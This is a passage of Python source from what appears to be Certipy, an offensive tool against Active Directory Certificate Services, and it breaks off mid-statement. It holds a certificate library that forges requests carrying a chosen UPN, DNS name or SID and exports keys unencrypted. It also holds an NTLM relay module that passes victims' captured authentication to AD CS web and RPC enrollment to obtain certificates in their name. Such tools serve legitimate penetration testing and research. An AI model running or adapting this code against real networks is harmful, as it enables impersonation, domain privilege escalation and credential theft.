    }
)

PRINCIPAL_NAME = x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")
NTDS_CA_SECURITY_EXT = x509.ObjectIdentifier("1.3.6.1.4.1.311.25.2")
NTDS_OBJECTSID = x509.ObjectIdentifier("1.3.6.1.4.1.311.25.2.1")

szOID_RENEWAL_CERTIFICATE = asn1cms.ObjectIdentifier("1.3.6.1.4.1.311.13.1")
szOID_ENCRYPTED_KEY_HASH = asn1cms.ObjectIdentifier("1.3.6.1.4.1.311.21.21")
szOID_PRINCIPAL_NAME = asn1cms.ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")
szOID_ENCRYPTED_KEY_HASH = asn1cms.ObjectIdentifier("1.3.6.1.4.1.311.21.21")
szOID_CMC_ADD_ATTRIBUTES = asn1cms.ObjectIdentifier("1.3.6.1.4.1.311.10.10.1")
szOID_NTDS_CA_SECURITY_EXT = asn1cms.ObjectIdentifier("1.3.6.1.4.1.311.25.2")
szOID_NTDS_OBJECTSID = asn1cms.ObjectIdentifier("1.3.6.1.4.1.311.25.2.1")

class TaggedCertificationRequest(asn1core.Sequence):
    _fields = [
        ("bodyPartID", asn1core.Integer),
        ("certificationRequest", asn1csr.CertificationRequest),
    ]


class TaggedRequest(asn1core.Choice):
    _alternatives = [
        ("tcr", TaggedCertificationRequest, {"implicit": 0}),
        ("crm", asn1core.Any, {"implicit": 1}),
        ("orm", asn1core.Any, {"implicit": 2}),
    ]


class TaggedAttribute(asn1core.Sequence):
    _fields = [
        ("bodyPartID", asn1core.Integer),
        ("attrType", asn1core.ObjectIdentifier),
        ("attrValues", asn1cms.SetOfAny),
    ]


class TaggedAttributes(asn1core.SequenceOf):
    _child_spec = TaggedAttribute


class TaggedRequests(asn1core.SequenceOf):
    _child_spec = TaggedRequest


class TaggedContentInfos(asn1core.SequenceOf):
    _child_spec = asn1core.Any  # not implemented


class OtherMsgs(asn1core.SequenceOf):
    _child_spec = asn1core.Any  # not implemented


class PKIData(asn1core.Sequence):
    _fields = [
        ("controlSequence", TaggedAttributes),
        ("reqSequence", TaggedRequests),
        ("cmsSequence", TaggedContentInfos),
        ("otherMsgSequence", OtherMsgs),
    ]


class CertReference(asn1core.SequenceOf):
    _child_spec = asn1core.Integer


class CMCAddAttributesInfo(asn1core.Sequence):
    _fields = [
        ("data_reference", asn1core.Integer),
        ("cert_reference", CertReference),
        ("attributes", asn1csr.SetOfAttributes),
    ]


class EnrollmentNameValuePair(asn1core.Sequence):
    _fields = [
        ("name", asn1core.BMPString),
        ("value", asn1core.BMPString),
    ]


class EnrollmentNameValuePairs(asn1core.SetOf):
    _child_spec = EnrollmentNameValuePair


def cert_id_to_parts(identifications: List[Tuple[str, str]]) -> Tuple[str, str]:
    usernames = []
    domains = []

    if len(identifications) == 0:
        return (None, None)

    for id_type, identification in identifications:
        if id_type != "DNS Host Name" and id_type != "UPN":
            continue

        if id_type == "DNS Host Name":
            parts = identification.split(".")
            if len(parts) == 1:
                cert_username = identification
                cert_domain = ""
            else:
                cert_username = parts[0] + "$"
                cert_domain = ".".join(parts[1:])
        elif id_type == "UPN":
            parts = identification.split("@")
            if len(parts) == 1:
                cert_username = identification
                cert_domain = ""
            else:
                cert_username = "@".join(parts[:-1])
                cert_domain = parts[-1]

        usernames.append(cert_username)
        domains.append(cert_domain)
    return ("_".join(usernames), "_".join(domains))


def csr_to_der(csr: x509.CertificateSigningRequest) -> bytes:
    return csr.public_bytes(Encoding.DER)


def csr_to_pem(csr: x509.CertificateSigningRequest) -> bytes:
    pem = csr.public_bytes(Encoding.PEM)
    return csr.public_bytes(Encoding.PEM)


def cert_to_pem(cert: x509.Certificate) -> bytes:
    return cert.public_bytes(Encoding.PEM)


def cert_to_der(cert: x509.Certificate) -> bytes:
    return cert.public_bytes(Encoding.DER)


def key_to_pem(key: rsa.RSAPrivateKey) -> bytes:
    return key.private_bytes(
        Encoding.PEM, PrivateFormat.PKCS8, encryption_algorithm=NoEncryption()
    )


def key_to_der(key: rsa.RSAPrivateKey) -> bytes:
    return key.private_bytes(
        Encoding.DER, PrivateFormat.PKCS8, encryption_algorithm=NoEncryption()
    )


def der_to_pem(der: bytes, pem_type: str) -> bytes:
    pem_type = pem_type.upper()
    b64_data = base64.b64encode(der).decode()
    return "-----BEGIN %s-----\n%s\n-----END %s-----\n" % (
        pem_type,
        "\n".join([b64_data[i : i + 64] for i in range(0, len(b64_data), 64)]),
        pem_type,
    )


def der_to_csr(csr: bytes) -> x509.CertificateSigningRequest:
    return x509.load_der_x509_csr(csr)


def der_to_key(key: bytes) -> rsa.RSAPrivateKey:
    return serialization.load_der_private_key(key, None)


def pem_to_key(key: bytes) -> rsa.RSAPrivateKey:
    return serialization.load_pem_private_key(key, None)


def der_to_cert(certificate: bytes) -> x509.Certificate:
    return x509.load_der_x509_certificate(certificate)


def pem_to_cert(certificate: bytes) -> x509.Certificate:
    return x509.load_pem_x509_certificate(certificate)


def private_key_to_ms_blob(private_key: rsa.RSAPrivateKey):
    bitlen = private_key.key_size
    private_numbers = private_key.private_numbers()
    public_numbers = private_numbers.public_numbers

    bitlen8 = math.ceil(bitlen / 8)
    bitlen16 = math.ceil(bitlen / 16)

    return struct.pack(
        "<bbHI4sII%ds%ds%ds%ds%ds%ds%ds"
        % (bitlen8, bitlen16, bitlen16, bitlen16, bitlen16, bitlen16, bitlen8),
        7,
        2,
        0,
        41984,
        b"RSA2",
        bitlen,
        public_numbers.e,
        public_numbers.n.to_bytes(bitlen8, "little"),
        private_numbers.p.to_bytes(bitlen16, "little"),
        private_numbers.q.to_bytes(bitlen16, "little"),
        private_numbers.dmp1.to_bytes(bitlen16, "little"),
        private_numbers.dmq1.to_bytes(bitlen16, "little"),
        private_numbers.iqmp.to_bytes(bitlen16, "little"),
        private_numbers.d.to_bytes(bitlen8, "little"),
    )


def get_identifications_from_certificate(
    certificate: x509.Certificate,
) -> Tuple[str, str]:
    identifications = []
    try:
        san = certificate.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )

        for name in san.value.get_values_for_type(x509.OtherName):
            if name.type_id == PRINCIPAL_NAME:
                identifications.append(
                    (
                        "UPN",
                        decoder.decode(name.value, asn1Spec=UTF8String)[0].decode(),
                    )
                )

        for name in san.value.get_values_for_type(x509.DNSName):
            identifications.append(("DNS Host Name", name))
    except:
        pass

    return identifications


def get_object_sid_from_certificate(
    certificate: x509.Certificate,
) -> str:
    try:
        object_sid = certificate.extensions.get_extension_for_oid(NTDS_CA_SECURITY_EXT)

        sid = object_sid.value.value
        return sid[sid.find(b"S-1-5") :].decode()
    except:
        pass

    return None


def create_pfx(key: rsa.RSAPrivateKey, cert: x509.Certificate) -> bytes:
    return pkcs12.serialize_key_and_certificates(
        name=b"",
        key=key,
        cert=cert,
        cas=None,
        encryption_algorithm=NoEncryption(),
    )


def load_pfx(
    pfx: bytes, password: bytes = None
) -> Tuple[rsa.RSAPrivateKey, x509.Certificate, None]:
    return pkcs12.load_key_and_certificates(pfx, password)[:-1]


def generate_rsa_key(key_size: int = 2048) -> rsa.RSAPrivateKey:
    return rsa.generate_private_key(public_exponent=0x10001, key_size=key_size)


def create_csr(
    username: str,
    alt_dns: bytes = None,
    alt_upn: bytes = None,
    alt_sid: bytes = None,
    key: rsa.RSAPrivateKey = None,
    key_size: int = 2048,
    subject: str = None,
    renewal_cert: x509.Certificate = None,
) -> Tuple[x509.CertificateSigningRequest, rsa.RSAPrivateKey]:
    if key is None:
        logging.debug("Generating RSA key")
        key = generate_rsa_key(key_size)

    # csr = asn1csr.CertificationRequest()
    certification_request_info = asn1csr.CertificationRequestInfo()
    certification_request_info["version"] = "v1"
    # csr = x509.CertificateSigningRequestBuilder()

    if subject:
        subject_name = get_subject_from_str(subject)
    else:
        subject_name = x509.Name(
            [
                x509.NameAttribute(NameOID.COMMON_NAME, username.capitalize()),
            ]
        )

    certification_request_info["subject"] = asn1csr.Name.load(
        subject_name.public_bytes()
    )

    public_key = key.public_key().public_bytes(
        Encoding.DER, PublicFormat.SubjectPublicKeyInfo
    )

    subject_pk_info = asn1csr.PublicKeyInfo.load(public_key)
    certification_request_info["subject_pk_info"] = subject_pk_info

    cri_attributes = []
    if alt_dns or alt_upn:
        general_names = []

        if alt_dns:
            if type(alt_dns) == bytes:
                alt_dns = alt_dns.decode()
            general_names.append(asn1x509.GeneralName({"dns_name": alt_dns}))

        if alt_upn:
            if type(alt_upn) == bytes:
                alt_upn = alt_upn.decode()

            general_names.append(
                asn1x509.GeneralName(
                    {
                        "other_name": asn1x509.AnotherName(
                            {
                                "type_id": szOID_PRINCIPAL_NAME,
                                "value": asn1x509.UTF8String(alt_upn).retag(
                                    {"explicit": 0}
                                ),
                            }
                        )
                    }
                )
            )

        san_extension = asn1x509.Extension(
            {"extn_id": "subject_alt_name", "extn_value": general_names}
        )

        set_of_extensions = asn1csr.SetOfExtensions([[san_extension]])

        cri_attribute = asn1csr.CRIAttribute(
            {"type": "extension_request", "values": set_of_extensions}
        )

        cri_attributes.append(cri_attribute)

    if alt_sid:
        if type(alt_sid) == str:
            alt_sid = alt_sid.encode()


        san_extension = asn1x509.Extension(
            {"extn_id": "security_ext", "extn_value": [asn1x509.GeneralName(
                {
                    "other_name": asn1x509.AnotherName(
                        {
                            "type_id": szOID_NTDS_OBJECTSID,
                            "value": asn1x509.OctetString(alt_sid).retag(
                                {"explicit": 0}
                            ),
                        }
                    )
                }
            )]}
        )

        set_of_extensions = asn1csr.SetOfExtensions([[san_extension]])

        cri_attribute = asn1csr.CRIAttribute(
            {"type": "extension_request", "values": set_of_extensions}
        )

        cri_attributes.append(cri_attribute)

    if renewal_cert:
        cri_attributes.append(
            asn1csr.CRIAttribute(
                {
                    "type": "1.3.6.1.4.1.311.13.1",
                    "values": asn1x509.SetOf(
                        [asn1x509.Certificate.load(cert_to_der(renewal_cert))],
                        spec=asn1x509.Certificate,
                    ),
                }
            )
        )

    certification_request_info["attributes"] = cri_attributes

    signature = rsa_pkcs1v15_sign(certification_request_info.dump(), key)

    csr = asn1csr.CertificationRequest(
        {
            "certification_request_info": certification_request_info,
            "signature_algorithm": asn1csr.SignedDigestAlgorithm(
                {"algorithm": "sha256_rsa"}
            ),
            "signature": signature,
        }
    )

    return (der_to_csr(csr.dump()), key)


def rsa_pkcs1v15_sign(
    data: bytes, key: rsa.RSAPrivateKey, hash: hashes.HashAlgorithm = hashes.SHA256
):
    return key.sign(data, padding.PKCS1v15(), hash())


def hash_digest(data: bytes, hash: hashes.Hash):
    digest = hashes.Hash(hash())
    digest.update(data)
    return digest.finalize()


def create_renewal(
    request: bytes,
    cert: x509.Certificate,
    key: rsa.RSAPrivateKey,
):
    x509_cert = asn1x509.Certificate.load(cert_to_der(cert))
    signature_hash_algorithm = cert.signature_hash_algorithm.__class__

    # SignerInfo

    issuer_and_serial = asn1cms.IssuerAndSerialNumber(
        {
            "issuer": x509_cert.issuer,
            "serial_number": x509_cert.serial_number,
        }
    )

    digest_algorithm = asn1cms.DigestAlgorithm(
        {"algorithm": signature_hash_algorithm.name}
    )

    signed_attribs = asn1cms.CMSAttributes(
        [
            asn1cms.CMSAttribute(
                {
                    "type": "1.3.6.1.4.1.311.13.1",
                    "values": asn1cms.SetOfAny(
                        [asn1x509.Certificate.load(cert_to_der(cert))],
                        spec=asn1x509.Certificate,
                    ),
                }
            ),
            asn1cms.CMSAttribute(
                {
                    "type": "message_digest",
                    "values": [hash_digest(request, signature_hash_algorithm)],
                }
            ),
        ]
    )

    attribs_signature = rsa_pkcs1v15_sign(
        signed_attribs.dump(), key, hash=signature_hash_algorithm
    )

    signer_info = asn1cms.SignerInfo(
        {
            "version": 1,
            "sid": issuer_and_serial,
            "digest_algorithm": digest_algorithm,
            "signature_algorithm": x509_cert["signature_algorithm"],
            "signature": attribs_signature,
            "signed_attrs": signed_attribs,
        }
    )

    # SignedData

    content_info = asn1cms.EncapsulatedContentInfo(
        {
            "content_type": "data",
            "content": request,
        }
    )

    signed_data = asn1cms.SignedData(
        {
            "version": 3,
            "digest_algorithms": [digest_algorithm],
            "encap_content_info": content_info,
            "certificates": [asn1cms.CertificateChoices({"certificate": x509_cert})],
            "signer_infos": [signer_info],
        }
    )

    # CMC

    cmc = asn1cms.ContentInfo(
        {
            "content_type": "signed_data",
            "content": signed_data,
        }
    )

    return cmc.dump()


def create_on_behalf_of(
    request: bytes,
    on_behalf_of: str,
    cert: x509.Certificate,
    key: rsa.RSAPrivateKey,
):
    x509_cert = asn1x509.Certificate.load(cert_to_der(cert))
    signature_hash_algorithm = cert.signature_hash_algorithm.__class__

    # SignerInfo

    issuer_and_serial = asn1cms.IssuerAndSerialNumber(
        {
            "issuer": x509_cert.issuer,
            "serial_number": x509_cert.serial_number,
        }
    )

    digest_algorithm = asn1cms.DigestAlgorithm(
        {"algorithm": signature_hash_algorithm.name}
    )

    requester_name = EnrollmentNameValuePair(
        {
            "name": checkNullString("requestername"),
            "value": checkNullString(on_behalf_of),
        }
    )

    signed_attribs = asn1cms.CMSAttributes(
        [
            asn1cms.CMSAttribute(
                {"type": "1.3.6.1.4.1.311.13.2.1", "values": [requester_name]}
            ),
            asn1cms.CMSAttribute(
                {
                    "type": "message_digest",
                    "values": [hash_digest(request, signature_hash_algorithm)],
                }
            ),
        ]
    )

    attribs_signature = rsa_pkcs1v15_sign(
        signed_attribs.dump(), key, hash=signature_hash_algorithm
    )

    signer_info = asn1cms.SignerInfo(
        {
            "version": 1,
            "sid": issuer_and_serial,
            "digest_algorithm": digest_algorithm,
            "signature_algorithm": x509_cert["signature_algorithm"],
            "signature": attribs_signature,
            "signed_attrs": signed_attribs,
        }
    )

    # SignedData

    content_info = asn1cms.EncapsulatedContentInfo(
        {
            "content_type": "data",
            "content": request,
        }
    )

    signed_data = asn1cms.SignedData(
        {
            "version": 3,
            "digest_algorithms": [digest_algorithm],
            "encap_content_info": content_info,
            "certificates": [asn1cms.CertificateChoices({"certificate": x509_cert})],
            "signer_infos": [signer_info],
        }
    )

    # CMC

    cmc = asn1cms.ContentInfo(
        {
            "content_type": "signed_data",
            "content": signed_data,
        }
    )

    return cmc.dump()


def create_key_archival(
    csr: x509.CertificateSigningRequest,
    private_key: rsa.RSAPrivateKey,
    cax_cert: x509.Certificate,
):
    x509_cax_cert = asn1x509.Certificate.load(cert_to_der(cax_cert))
    x509_csr = asn1csr.CertificationRequest.load(cert_to_der(csr))

    signature_hash_algorithm = csr.signature_hash_algorithm.__class__
    symmetric_key = os.urandom(32)
    iv = os.urandom(16)
    cax_key = cax_cert.public_key()
    encrypted_key = cax_key.encrypt(symmetric_key, padding.PKCS1v15())

    # EnvelopedData

    cax_issuer_and_serial = asn1cms.IssuerAndSerialNumber(
        {
            "issuer": x509_cax_cert.issuer,
            "serial_number": x509_cax_cert.serial_number,
        }
    )
    recipient_info = asn1cms.KeyTransRecipientInfo(
        {
            "version": 0,
            "rid": cax_issuer_and_serial,
            "key_encryption_algorithm": asn1cms.KeyEncryptionAlgorithm(
                {"algorithm": "rsaes_pkcs1v15"}
            ),
            "encrypted_key": encrypted_key,
        }
    )

    encryption_algorithm = asn1cms.EncryptionAlgorithm(
        {"algorithm": "aes256_cbc", "parameters": iv}
    )

    private_key_bytes = private_key_to_ms_blob(private_key)

    cipher = Cipher(algorithms.AES(symmetric_key), modes.CBC(iv))

    padder = PKCS7(encryption_algorithm.encryption_block_size * 8).padder()
    padded_private_key_bytes = padder.update(private_key_bytes) + padder.finalize()
    encryptor = cipher.encryptor()

    encrypted_private_key_bytes = (
        encryptor.update(padded_private_key_bytes) + encryptor.finalize()
    )

    encrypted_content_info = asn1cms.EncryptedContentInfo(
        {
            "content_type": "data",
            "content_encryption_algorithm": encryption_algorithm,
            "encrypted_content": encrypted_private_key_bytes,
        }
    )

    enveloped_data = asn1cms.EnvelopedData(
        {
            "version": 0,
            "recipient_infos": asn1cms.RecipientInfos([recipient_info]),
            "encrypted_content_info": encrypted_content_info,
        }
    )

    enveloped_data_info = asn1cms.ContentInfo(
        {
            "content_type": "1.2.840.113549.1.7.3",
            "content": enveloped_data,
        }
    )

    encrypted_key_hash = hash_digest(
        enveloped_data_info.dump(), signature_hash_algorithm
    )

    # PKIData

    attributes = asn1csr.SetOfAttributes(
        [
            asn1csr.Attribute(
                {
                    "type": szOID_ENCRYPTED_KEY_HASH,
                    "values": [asn1core.OctetString(encrypted_key_hash)],
                }
            )
        ]
    )

    attributes_info = CMCAddAttributesInfo(
        {"data_reference": 0, "cert_reference": [1], "attributes": attributes}
    )

    tagged_attribute = TaggedAttribute(
        {
            "bodyPartID": 2,
            "attrType": szOID_CMC_ADD_ATTRIBUTES,
            "attrValues": [attributes_info],
        }
    )

    tagged_request = TaggedRequest(
        {
            "tcr": TaggedCertificationRequest(
                {
                    "bodyPartID": 1,
                    "certificationRequest": asn1csr.CertificationRequest().load(
                        cert_to_der(csr)
                    ),
                }
            )
        }
    )

    pki_data = PKIData(
        {
            "controlSequence": [tagged_attribute],
            "reqSequence": [tagged_request],
            "cmsSequence": TaggedContentInfos([]),
            "otherMsgSequence": OtherMsgs([]),
        }
    )

    pki_data_bytes = pki_data.dump()

    cmc_request_hash = hash_digest(pki_data_bytes, signature_hash_algorithm)

    # SignerInfo

    digest_algorithm = asn1cms.DigestAlgorithm(
        {"algorithm": signature_hash_algorithm.name}
    )

    skid = SubjectKeyIdentifier.from_public_key(csr.public_key()).digest

    signed_attribs = asn1cms.CMSAttributes(
        [
            asn1cms.CMSAttribute(
                {"type": "content_type", "values": ["1.3.6.1.5.5.7.12.2"]}
            ),
            asn1cms.CMSAttribute(
                {
                    "type": "message_digest",
                    "values": [cmc_request_hash],
                }
            ),
        ]
    )

    attribs_signature = rsa_pkcs1v15_sign(
        signed_attribs.dump(), private_key, hash=signature_hash_algorithm
    )

    signer_info = asn1cms.SignerInfo(
        {
            "version": 3,
            "sid": asn1cms.SignerIdentifier({"subject_key_identifier": skid}),
            "digest_algorithm": digest_algorithm,
            "signature_algorithm": x509_csr["signature_algorithm"],
            "signature": attribs_signature,
            "signed_attrs": signed_attribs,
            "unsigned_attrs": asn1cms.CMSAttributes(
                [
                    asn1cms.CMSAttribute(
                        {
                            "type": "1.3.6.1.4.1.311.21.13",
                            "values": [enveloped_data_info],
                        }
                    )
                ]
            ),
        }
    )

    # SignedData

    content_info = asn1cms.EncapsulatedContentInfo(
        {
            "content_type": "1.3.6.1.5.5.7.12.2",
            "content": pki_data_bytes,
        }
    )

    signed_data = asn1cms.SignedData(
        {
            "version": 3,
            "digest_algorithms": [digest_algorithm],
            "encap_content_info": content_info,
            "signer_infos": [signer_info],
        }
    )

    # CMC

    cmc = asn1cms.ContentInfo(
        {
            "content_type": "signed_data",
            "content": signed_data,
        }
    )

    return cmc.dump()


def entry(options: argparse.Namespace) -> None:
    cert, key = None, None

    if not any([options.pfx, options.cert, options.key]):
        logging.error("-pfx, -cert, or -key is required")
        return

    if options.pfx:
        password = None
        if options.password:
            logging.debug(
                "Loading PFX %s with password %s" % (repr(options.pfx), password)
            )
            password = options.password.encode()
        else:
            logging.debug("Loading PFX %s without password" % repr(options.pfx))

        with open(options.pfx, "rb") as f:
            pfx = f.read()

        key, cert = load_pfx(pfx, password)

    if options.cert:
        logging.debug("Loading certificate from %s" % repr(options.cert))

        with open(options.cert, "rb") as f:
            cert = f.read()
        try:
            cert = pem_to_cert(cert)
        except Exception:
            cert = der_to_cert(cert)

    if options.key:
        logging.debug("Loading private key from %s" % repr(options.cert))

        with open(options.key, "rb") as f:
            key = f.read()
        try:
            key = pem_to_key(key)
        except Exception:
            key = der_to_key(key)

    if options.export:
        pfx = create_pfx(key, cert)
        if options.out:
            logging.info("Writing PFX to %s" % repr(options.out))

            with open(options.out, "wb") as f:
                f.write(pfx)
        else:
            sys.stdout.buffer.write(pfx)
    else:
        output = ""
        log_str = ""
        if cert and not options.nocert:
            output += cert_to_pem(cert).decode()
            log_str += "certificate"
            if key:
                log_str += " and "

        if key and not options.nokey:
            output += key_to_pem(key).decode()
            log_str += "private key"

        if len(output) == 0:
            logging.error("Output is empty")
            return

        if options.out:
            logging.info("Writing %s to %s" % (log_str, repr(options.out)))

            with open(options.out, "w") as f:
                f.write(output)
        else:
            print(output)


def dn_to_components(dn):
    components = []
    component = ""
    escape_sequence = False
    for c in dn:
        if c == "\\":
            escape_sequence = True
        elif escape_sequence and c != " ":
            escape_sequence = False
        elif c == ",":
            if "=" in component:
                attr_name, _, value = component.partition("=")
                component = (attr_name.strip().upper(), value.strip())
                components.append(component)
                component = ""
                continue

        component += c

    attr_name, _, value = component.partition("=")
    component = (attr_name.strip(), value.strip())
    components.append(component)
    return components


def get_subject_from_str(subject) -> x509.Name:
    return x509.Name(x509.Name.from_rfc4514_string(subject).rdns[::-1])



import argparse
import base64
import os
import re
import time
import traceback
import urllib.parse
from struct import unpack
from threading import Lock

from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
from impacket.examples.ntlmrelayx.clients.httprelayclient import HTTPRelayClient
from impacket.examples.ntlmrelayx.clients import rpcrelayclient
from impacket.examples.ntlmrelayx.servers import SMBRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor
from impacket.nt_errors import STATUS_ACCESS_DENIED, STATUS_SUCCESS
from impacket.ntlm import NTLMAuthChallengeResponse
from impacket.spnego import SPNEGO_NegTokenResp
from impacket.dcerpc.v5 import epm

from certipy.lib.certificate import (
    cert_id_to_parts,
    cert_to_pem,
    create_csr,
    create_pfx,
    csr_to_der,
    csr_to_pem,
    get_identifications_from_certificate,
    get_object_sid_from_certificate,
    key_to_pem,
    pem_to_cert,
    pem_to_key,
    rsa,
    x509,
)
from certipy.lib.errors import translate_error_code
from certipy.lib.formatting import print_certificate_identifications
from certipy.lib.logger import logging
from certipy.commands.req import MSRPC_UUID_ICPR, RPCRequestInterface

try:
    from http.client import HTTPConnection
except ImportError:
    from httplib import HTTPConnection


class ADCSHTTPRelayServer(HTTPRelayClient):
    def initConnection(self):
        logging.debug("Connecting to %s:%s..." % (self.targetHost, self.targetPort))
        self.session = HTTPConnection(
            self.targetHost, self.targetPort, timeout=self.adcs_relay.timeout
        )
        self.session.connect()
        logging.debug("Connected to %s:%s" % (self.targetHost, self.targetPort))
        self.lastresult = None
        if self.target.path == "":
            self.path = "/"
        else:
            self.path = self.target.path
        return True

    def sendAuth(self, *args, **kwargs):
        self.adcs_relay.attack_lock.acquire()
        try:
            response = self._sendAuth(*args, **kwargs)
        except Exception as e:
            logging.error("Got error: %s" % e)
            if self.adcs_relay.verbose:
                traceback.print_exc()
            else:
                logging.error("Use -debug to print a stacktrace")
            response = None, STATUS_ACCESS_DENIED
        finally:
            self.adcs_relay.attack_lock.release()
            return response

    def _sendAuth(self, authenticateMessageBlob, serverChallenge=None):
        if (
            unpack("B", authenticateMessageBlob[:1])[0]
            == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP
        ):
            respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
            token = respToken2["ResponseToken"]
        else:
            token = authenticateMessageBlob

        try:
            response = NTLMAuthChallengeResponse()
            response.fromString(data=token)

            domain = response["domain_name"].decode("utf-16le")
            username = response["user_name"].decode("utf-16le")

            self.session.user = "%s\\%s" % (domain, username)

            print(self.session.user)

            auth = base64.b64encode(token).decode("ascii")
            headers = {"Authorization": "%s %s" % (self.authenticationMethod, auth)}
            self.session.request("GET", self.path, headers=headers)
            res = self.session.getresponse()

            if res.status == 401:
                logging.error("Got unauthorized response from AD CS")
                return None, STATUS_ACCESS_DENIED
            else:
                logging.debug(
                    "HTTP server returned error code %d, treating as a successful login"
                    % res.status
                )
                # Cache this
                self.lastresult = res.read()
                return None, STATUS_SUCCESS
        except Exception as e:
            logging.error("Got error: %s" % e)
            if self.adcs_relay.verbose:
                traceback.print_exc()
            else:
                logging.error("Use -debug to print a stacktrace")


class ADCSRPCRelayServer(rpcrelayclient.RPCRelayClient, rpcrelayclient.ProtocolClient):
    def __init__(self, serverConfig, target, targetPort=None, extendedSecurity=True):
        rpcrelayclient.ProtocolClient.__init__(
            self, serverConfig, target, targetPort, extendedSecurity
        )

        self.endpoint = "ICPR"

        self.endpoint_uuid = MSRPC_UUID_ICPR

        logging.info(
            "Connecting to ncacn_ip_tcp:%s[135] to determine %s stringbinding"
            % (target.netloc, self.endpoint)
        )
        self.stringbinding = epm.hept_map(
            target.netloc, self.endpoint_uuid, protocol="ncacn_ip_tcp"
        )

        logging.debug("%s stringbinding is %s" % (self.endpoint, self.stringbinding))

    def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
        if (
            unpack("B", authenticateMessageBlob[:1])[0]
            == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP
        ):
            respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
            auth_data = respToken2["ResponseToken"]
        else:
            auth_data = authenticateMessageBlob

        self.session.sendBindType3(auth_data)

        try:
            req = rpcrelayclient.DummyOp()
            self.session.request(req)
        except rpcrelayclient.DCERPCException as e:
            if "nca_s_op_rng_error" in str(e) or "RPC_E_INVALID_HEADER" in str(e):
                return None, STATUS_SUCCESS
            elif "rpc_s_access_denied" in str(e):
                return None, STATUS_ACCESS_DENIED
            else:
                logging.info(
                    "Unexpected rpc code received from %s: %s"
                    % (self.stringbinding, str(e))
                )
                return None, STATUS_ACCESS_DENIED

    def killConnection(self):
        if self.session is not None:
            self.session.get_rpc_transport().disconnect()
            self.session = None

    def keepAlive(self):
        try:
            req = rpcrelayclient.DummyOp()
            self.session.request(req)
        except rpcrelayclient.DCERPCException as e:
            if "nca_s_op_rng_error" not in str(e) or "RPC_E_INVALID_HEADER" not in str(
                e
            ):
                raise


class ADCSHTTPAttackClient(ProtocolAttack):
    def run(self):
        self.adcs_relay.attack_lock.acquire()
        try:
            self._run()
        except Exception as e:
            logging.error("Got error: %s" % e)
            if self.adcs_relay.verbose:
                traceback.print_exc()
            else:
                logging.error("Use -debug to print a stacktrace")
        finally:
            self.adcs_relay.attack_lock.release()

    def _run(self):
        if (
            not self.adcs_relay.no_skip
            and self.client.user in self.adcs_relay.attacked_targets
        ):
            logging.debug(
                "Skipping user %s since attack was already performed"
                % repr(self.client.user)
            )
            return

        request_id = self.adcs_relay.request_id
        if request_id:
            self.client.request("GET", "/certsrv/certnew.cer?ReqID=%d" % request_id)

            response = self.client.getresponse()
            content = response.read()

            if response.status != 200:
                logging.error("Got error while requesting certificate")
                if self.adcs_relay.verbose:
                    logging.warning("Got error while trying to request certificate:")
                    print(content)
                else:
                    logging.warning(
                        "Got error while trying to request certificate. Use -debug to print the response"
                    )
                return

            if b"BEGIN CERTIFICATE" in content:
                cert = pem_to_cert(content)
            else:
                content = content.decode()
                if "Taken Under Submission" in content:
                    logging.warning("Certificate request is still pending approval")
                elif "The requested property value is empty" in content:
                    logging.warning("Unknown request ID %d" % request_id)
                else:
                    error_code = re.findall(r" (0x[0-9a-fA-F]+) \(", content)
                    try:
                        error_code = int(error_code[0], 16)
                        msg = translate_error_code(error_code)
                        logging.warning("Got error from AD CS: %s" % msg)
                    except:
                        logging.warning("Got unknown error from AD CS:")
                        if self.adcs_relay.verbose:
                            print(content)
                        else:
                            logging.warning("Use -debug to print the response")

                return self.finish_run()

            return self.save_certificate(cert, request_id=request_id)

        template = self.config.template

        if template is None:
            template = "Machine" if self.username.endswith("$") else "User"

        csr, key = create_csr(
            self.username,
            alt_dns=self.adcs_relay.dns,
            alt_upn=self.adcs_relay.upn,
            alt_sid=self.adcs_relay.sid,
            key_size=self.adcs_relay.key_size,
        )

        csr = csr_to_pem(csr).decode()

        attributes = ["CertificateTemplate:%s" % template]

        if self.adcs_relay.upn is not None or self.adcs_relay.dns is not None:
            san = []
            if self.adcs_relay.dns:
                san.append("dns=%s" % self.adcs_relay.dns)
            if self.adcs_relay.upn:
                san.append("upn=%s" % self.adcs_relay.upn)

            attributes.append("SAN:%s" % "&".join(san))

        attributes = "\n".join(attributes)

        params = {
            "Mode": "newreq",
            "CertAttrib": attributes,
            "CertRequest": csr,
            "TargetStoreFlags": "0",
            "SaveCert": "yes",
            "ThumbPrint": "",
        }

        data = urllib.parse.urlencode(params)

        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": len(data),
        }

        logging.info(
            "Requesting certificate for %s based on the template %s"
            % (repr(self.client.user), repr(template))
        )

        self.client.request("POST", "/certsrv/certfnsh.asp", body=data, headers=headers)
        response = self.client.getresponse()
        content = response.read().decode()

        if response.status != 200:
            logging.error("Got error while requesting certificate")
            if self.adcs_relay.verbose:
                print(content)
            else:
                logging.warning("Use -debug to print the response")
            return

        request_id = re.findall(r"certnew.cer\?ReqID=([0-9]+)&", content)
        if not request_id:
            if "template that is not supported" in content:
                logging.error("Template %s is not supported by AD CS" % repr(template))
                return
            else:
                if "Certificate Pending" in content:
                    logging.warning("Certificate request is pending approval")
                elif '"Denied by Policy Module"' in content:
                    logging.warning(
                        "Got access denied while trying to enroll in template %s"
                        % repr(template)
                    )
                else:
                    error_code = re.findall(
                        r"Denied by Policy Module  (0x[0-9a-fA-F]+),", content
                    )
                    try:
                        error_code = int(error_code[0], 16)
                        msg = translate_error_code(error_code)
                        logging.warning("Got error from AD CS: %s" % msg)
                    except:
                        logging.warning("Got unknown error from AD CS:")
                        if self.adcs_relay.verbose:
                            print(content)
                        else:
                            logging.warning("Use -debug to print the response")

            request_id = re.findall(r"Your Request Id is ([0-9]+)", content)
            if len(request_id) != 1:
                logging.error("Failed to get request id from response")
                return

            request_id = int(request_id[0])

            logging.info("Request ID is %d" % request_id)

            should_save = input(
